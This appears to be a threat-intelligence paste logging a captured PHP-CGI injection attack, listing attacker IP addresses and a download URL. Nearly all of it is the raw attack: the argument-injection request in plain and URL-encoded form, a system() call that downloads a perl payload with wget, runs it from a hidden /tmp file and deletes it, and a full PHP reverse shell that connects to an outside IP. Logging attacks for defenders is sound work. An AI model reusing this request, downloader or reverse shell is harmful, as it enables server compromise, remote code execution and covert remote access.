PHP Injection Attempt: 80.73.9.164 85.214.73.166

1. PHP Injection Attempt
2. Reported by neonprimetime security
3. http://neonprimetime.blogspot.com
4.  
5. *****
6. 80.73.9.164
7. 85.214.73.166
8. 91.121.105.21
9. 208.85.177.238
10. hxxp://208.85.177.238/.x/hb/php07
11. *****
12.  
13. POST /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
14.  
15. ****
16.  
17. POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
18.  
19. <?php system("wget 208.85.177.238/.x/hb/php07 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7 85.214.73.166;rm -rf /tmp/.bash_h1s7 &"); ?>set_time_limit(0);
20. $ip = '91.121.105.21';
21. $port = 22;
22. $chunk_size = 1400;
23. $write_a = null;
24. $error_a = null;
25. $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
26. $daemon = 0;
27. $debug = 0;
28. if (function_exists('pcntl_fork')) {
29. .$pid = pcntl_fork();.
30. .if ($pid == -1) {
31. ..printit("ERROR: Can't fork");
32. ..exit(1);
33. .}
34. .if ($pid) {
35. ..exit(0);
36. .}
37. .if (posix_setsid() == -1) {
38. ..printit("Error: Can't setsid()");
39. ..exit(1);
40. .}
41. .$daemon = 1;
42. } else {
43. .printit("WARNING: Failed to daemonise.");
44. }
45. chdir("/");
46. umask(0);
47. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
48. if (!$sock) {
49. .printit("$errstr ($errno)");
50. .exit(1);
51. }
52. $descriptorspec = array(
53. 0 => array("pipe", "r"),
54. 1 => array("pipe", "w"),
55. 2 => array("pipe", "w")
56. );
57. $process = proc_open($shell, $descriptorspec, $pipes);
58. if (!is_resource($process)) {
59. .printit("ERROR: Can't spawn shell");
60. .exit(1);
61. }
62. stream_set_blocking($pipes[0], 0);
63. stream_set_blocking($pipes[1], 0);
64. stream_set_blocking($pipes[2], 0);
65. stream_set_blocking($sock, 0);
66. while (1) {
67. .if (feof($sock)) {
68. ..printit("ERROR: Shell connection terminated");
69. ..break;
70. .}
71. .if (feof($pipes[1])) {
72. ..printit("ERROR: Shell process terminated");
73. ..break;
74. .}
75. .$read_a = array($sock, $pipes[1], $pipes[2]);
76. .$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
77. .if (in_array($sock, $read_a)) {
78. ..if ($debug) printit("SOCK READ");
79. ..$input = fread($sock, $chunk_size);
80. ..if ($debug) printit("SOCK: $input");
81. ..fwrite($pipes[0], $input);
82. .}
83. .if (in_array($pipes[1], $read_a)) {
84. ..if ($debug) printit("STDOUT READ");
85. ..$input = fread($pipes[1], $chunk_size);
86. ..if ($debug) printit("STDOUT: $input");
87. ..fwrite($sock, $input);
88. .}
89. .if (in_array($pipes[2], $read_a)) {
90. ..if ($debug) printit("STDERR READ");
91. ..$input = fread($pipes[2], $chunk_size);
92. ..if ($debug) printit("STDERR: $input");
93. ..fwrite($sock, $input);
94. .}
95. }
96.  
97. fclose($sock);
98. fclose($pipes[0]);
99. fclose($pipes[1]);
100. fclose($pipes[2]);
101. proc_close($process);
102. function printit ($string) {
103. .if (!$daemon) {
104. ..print "$string
105. ";
106. .}
107. }
108. exit(1);
109. ?>